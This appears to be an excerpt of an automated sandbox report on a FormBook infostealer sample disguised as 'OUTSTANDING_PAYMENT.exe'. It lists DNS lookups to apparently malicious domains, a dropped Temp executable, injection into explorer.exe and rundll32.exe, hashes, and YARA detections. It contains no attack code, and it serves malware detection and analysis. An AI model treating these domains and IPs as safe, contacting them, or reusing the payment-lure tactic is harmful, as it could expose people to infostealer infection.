Mar 20, 2023 09:10:46.233026028 CET | 192.168.2.3 | 8.8.8.8 | 0x9aa8 | Standard query (0) | www.fanversewallet.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:58.079703093 CET | 192.168.2.3 | 8.8.8.8 | 0x8e22 | Standard query (0) | www.karlscurry.co.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:10.968102932 CET | 192.168.2.3 | 8.8.8.8 | 0xd22 | Standard query (0) | www.themssterofssuepnse.rest | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:37.019893885 CET | 192.168.2.3 | 8.8.8.8 | 0x528 | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:38.184684038 CET | 192.168.2.3 | 8.8.8.8 | 0xacb9 | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:39.347182989 CET | 192.168.2.3 | 8.8.8.8 | 0x43ad | Standard query (0) | www.brennmansoluciones.com | A (IP address) | IN (0x0001) | false
DNS Answers ("-" marks an empty column)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 09:08:18.108978987 CET | 8.8.8.8 | 192.168.2.3 | 0x7c1d | Server failure (2) | www.themssterofssuepnse.rest | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:23.235593081 CET | 8.8.8.8 | 192.168.2.3 | 0xa01d | No error (0) | www.hudsonandbailey.uk | - | 199.59.243.223 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.33.18.44 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.79.19.196 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 96.126.123.244 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.33.20.235 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 173.255.194.134 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.56.79.23 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.33.2.79 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 72.14.185.43 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.33.30.197 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 72.14.178.174 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:33.677284002 CET | 8.8.8.8 | 192.168.2.3 | 0xd7a5 | No error (0) | www.virginhairweave.co.uk | - | 45.33.23.183 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:44.618321896 CET | 8.8.8.8 | 192.168.2.3 | 0x34e3 | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:45.811009884 CET | 8.8.8.8 | 192.168.2.3 | 0x388c | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:46.985388994 CET | 8.8.8.8 | 192.168.2.3 | 0xb63f | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:08:52.196227074 CET | 8.8.8.8 | 192.168.2.3 | 0x96dc | No error (0) | www.dirdikyepedia.com | dirdikyepedia.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 09:08:52.196227074 CET | 8.8.8.8 | 192.168.2.3 | 0x96dc | No error (0) | dirdikyepedia.com | - | 5.181.216.141 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:15.094926119 CET | 8.8.8.8 | 192.168.2.3 | 0xc039 | No error (0) | www.g2fm.co.uk | - | 213.171.195.105 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:27.751117945 CET | 8.8.8.8 | 192.168.2.3 | 0x468d | No error (0) | www.mynichemarket.co.uk | - | 185.151.30.181 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:38.020363092 CET | 8.8.8.8 | 192.168.2.3 | 0x2560 | No error (0) | www.landlotto.ru | - | 109.70.26.37 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:38.020363092 CET | 8.8.8.8 | 192.168.2.3 | 0x2560 | No error (0) | www.landlotto.ru | - | 194.85.61.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:09:48.472723007 CET | 8.8.8.8 | 192.168.2.3 | 0xc976 | No error (0) | www.gorwly.top | - | 192.64.116.162 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:00.160120964 CET | 8.8.8.8 | 192.168.2.3 | 0x627d | Server failure (2) | www.ketoibabal.cyou | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:01.385709047 CET | 8.8.8.8 | 192.168.2.3 | 0xbe46 | Server failure (2) | www.ketoibabal.cyou | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:02.523490906 CET | 8.8.8.8 | 192.168.2.3 | 0x1805 | Server failure (2) | www.ketoibabal.cyou | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:07.567246914 CET | 8.8.8.8 | 192.168.2.3 | 0x1492 | Refused (5) | www.thelastwill.net | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:08.626447916 CET | 8.8.8.8 | 192.168.2.3 | 0x442d | Refused (5) | www.thelastwill.net | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:09.669090033 CET | 8.8.8.8 | 192.168.2.3 | 0x46d1 | Refused (5) | www.thelastwill.net | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:14.768513918 CET | 8.8.8.8 | 192.168.2.3 | 0x87cc | No error (0) | www.ty23vip.com | - | 162.209.159.142 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:25.829457998 CET | 8.8.8.8 | 192.168.2.3 | 0xc5ab | No error (0) | www.allison2patrick.online | allison2patrick.online | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 09:10:25.829457998 CET | 8.8.8.8 | 192.168.2.3 | 0xc5ab | No error (0) | allison2patrick.online | - | 62.4.21.190 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:36.065522909 CET | 8.8.8.8 | 192.168.2.3 | 0x5df2 | No error (0) | www.glb-mobility.com | glb-mobility.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 09:10:36.065522909 CET | 8.8.8.8 | 192.168.2.3 | 0x5df2 | No error (0) | glb-mobility.com | - | 88.99.217.197 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:46.512599945 CET | 8.8.8.8 | 192.168.2.3 | 0x9aa8 | No error (0) | www.fanversewallet.com | fanversewallet.com | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 09:10:46.512599945 CET | 8.8.8.8 | 192.168.2.3 | 0x9aa8 | No error (0) | fanversewallet.com | - | 203.245.24.47 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:10:58.134869099 CET | 8.8.8.8 | 192.168.2.3 | 0x8e22 | No error (0) | www.karlscurry.co.uk | - | 217.160.0.249 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:11.017399073 CET | 8.8.8.8 | 192.168.2.3 | 0xd22 | Server failure (2) | www.themssterofssuepnse.rest | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:37.163110971 CET | 8.8.8.8 | 192.168.2.3 | 0x528 | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:38.328841925 CET | 8.8.8.8 | 192.168.2.3 | 0xacb9 | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 09:11:39.494823933 CET | 8.8.8.8 | 192.168.2.3 | 0x43ad | Server failure (2) | www.brennmansoluciones.com | none | none | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 09:07:40
Start date: 20/03/2023
Path: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
Imagebase: 0x400000
File size: 297210 bytes
MD5 hash: 4832E17C1F6841AEE2E1984A429ED946
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 1
Start time: 09:07:41
Start date: 20/03/2023
Path: C:\Users\user\AppData\Local\Temp\qhcqh.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
Imagebase: 0xc50000
File size: 59904 bytes
MD5 hash: 41C9E29A7ED3640682A0003BE2DF4D93
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 51%, ReversingLabs
Reputation: low

                                                                                                                      Target ID:2
                                                                                                                      Start time:09:07:41
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Imagebase:0xc50000
                                                                                                                      File size:59904 bytes
                                                                                                                      MD5 hash:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:low

                                                                                                                      Target ID:3
                                                                                                                      Start time:09:07:47
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                      File size:3933184 bytes
                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      Target ID:13
                                                                                                                      Start time:09:08:02
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:61952 bytes
                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:high

                                                                                                                      No disassembly